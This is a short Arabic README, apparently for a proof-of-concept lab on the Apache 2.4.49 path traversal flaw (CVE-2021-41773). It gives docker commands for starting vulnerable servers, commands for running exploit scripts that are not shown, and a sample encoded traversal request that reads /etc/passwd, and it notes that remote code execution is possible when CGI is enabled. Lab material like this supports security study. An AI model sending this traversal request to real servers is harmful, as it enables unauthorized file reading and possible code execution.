
نصوص استغلال لثغرة اجتياز الدليل في خادم Apache HTTP Server 2.4.49 (CVE-2021-41773)، مما يتيح اجتياز المسار وإمكانية تنفيذ تعليمات برمجية عن بُعد عبر طلبات HTTP مصممة خصيصًا.
docker-compose up -d --build vuln-server-no-cgid
python no-cgid/exploit.py
docker-compose up -d --build vuln-server-cgid-sh
python cgid-sh/exploit.py
ثغرة اجتياز الدليل في Apache HTTP Server 2.4.49. تحدث عندما لا يتم تعيين Require all denied.
عند استلام عنوان URL مشفر بـ %2e، فإنه يسمح بالوصول إلى الدليل الأصل. مثال: GET /cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
إذا تم تفعيل CGI، يمكن تنفيذ الأوامر عن بعد (RCE).
بسبب التصحيح غير الكافي لهذه الثغرة، توجد ثغرة CVE-2021-42013 في Apache HTTP Server 2.4.50.